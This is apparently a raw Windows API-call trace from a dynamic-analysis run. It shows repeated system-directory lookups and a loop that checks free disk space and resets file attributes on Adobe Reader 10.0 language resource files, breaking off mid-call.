CoTaskMemFree (pv=0x508980) [0110.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.765] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.765] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.765] CoTaskMemFree (pv=0x508980) [0110.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0110.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0110.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0110.766] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.766] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.767] CoTaskMemFree (pv=0x508980) [0110.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0110.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0110.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0110.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0110.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0110.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0110.772] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.772] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.772] CoTaskMemFree (pv=0x508980) [0110.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0110.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0110.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0110.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0110.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0110.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0110.775] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.775] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.776] CoTaskMemFree (pv=0x508980) [0110.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0110.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0110.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0110.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0110.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0110.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0110.777] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.777] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.777] CoTaskMemFree (pv=0x508980) [0110.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0110.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0110.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0110.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0110.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0110.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0110.779] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.779] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.779] CoTaskMemFree (pv=0x508980) [0110.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0110.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0110.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0110.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0110.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0110.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0110.786] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.786] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.786] CoTaskMemFree (pv=0x508980) [0110.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0110.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0110.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0110.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0110.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0110.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0110.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0110.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0110.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0110.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0110.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0110.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0110.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0110.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0110.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0110.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0110.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0110.796] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf", dwFileAttributes=0x80) returned 1 [0110.798] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.798] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.798] CoTaskMemFree (pv=0x508980) [0110.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.802] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.802] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.802] CoTaskMemFree (pv=0x508980) [0110.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.816] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.816] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.816] CoTaskMemFree (pv=0x508980) [0110.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.822] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.822] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.822] CoTaskMemFree (pv=0x508980) [0110.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.823] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.824] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.824] CoTaskMemFree (pv=0x508980) [0110.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.824] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.824] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.824] CoTaskMemFree (pv=0x508980) [0110.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.837] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.844] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar.txt", dwFileAttributes=0x80) returned 1 [0110.847] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.853] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_AE.txt", dwFileAttributes=0x80) returned 1 [0110.855] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.861] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_BH.txt", dwFileAttributes=0x80) returned 1 [0110.864] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.869] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_DZ.txt", dwFileAttributes=0x80) returned 1 [0110.872] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.877] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_EG.txt", dwFileAttributes=0x80) returned 1 [0110.880] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.886] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IN.txt", dwFileAttributes=0x80) returned 1 [0110.889] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.894] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IQ.txt", dwFileAttributes=0x80) returned 1 [0110.897] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.902] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_JO.txt", dwFileAttributes=0x80) returned 1 [0110.905] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.910] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_KW.txt", dwFileAttributes=0x80) returned 1 [0110.918] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.924] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LB.txt", dwFileAttributes=0x80) returned 1 [0110.928] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.941] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LY.txt", dwFileAttributes=0x80) returned 1 [0110.944] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.950] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_MA.txt", dwFileAttributes=0x80) returned 1 [0110.953] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.958] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_OM.txt", dwFileAttributes=0x80) returned 1 [0110.962] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.967] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_QA.txt", dwFileAttributes=0x80) returned 1 [0110.970] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.975] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SA.txt", dwFileAttributes=0x80) returned 1 [0110.978] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.984] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SD.txt", dwFileAttributes=0x80) returned 1 [0110.986] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0110.992] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SY.txt", dwFileAttributes=0x80) returned 1 [0110.995] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.001] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_TN.txt", dwFileAttributes=0x80) returned 1 [0111.004] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.009] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_YE.txt", dwFileAttributes=0x80) returned 1 [0111.013] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.021] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg.txt", dwFileAttributes=0x80) returned 1 [0111.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.030] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg_BG.txt", dwFileAttributes=0x80) returned 1 [0111.033] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.039] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca.txt", dwFileAttributes=0x80) returned 1 [0111.042] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.048] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES.txt", dwFileAttributes=0x80) returned 1 [0111.051] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.056] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES_PREEURO.txt", dwFileAttributes=0x80) returned 1 [0111.059] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.065] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt", dwFileAttributes=0x80) returned 1 [0111.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.073] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs_CZ.txt", dwFileAttributes=0x80) returned 1 [0111.076] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.081] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da.txt", dwFileAttributes=0x80) returned 1 [0111.085] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.090] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da_DK.txt", dwFileAttributes=0x80) returned 1 [0111.093] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.098] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_CH.txt", dwFileAttributes=0x80) returned 1 [0111.101] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.107] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE.txt", dwFileAttributes=0x80) returned 1 [0111.110] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, 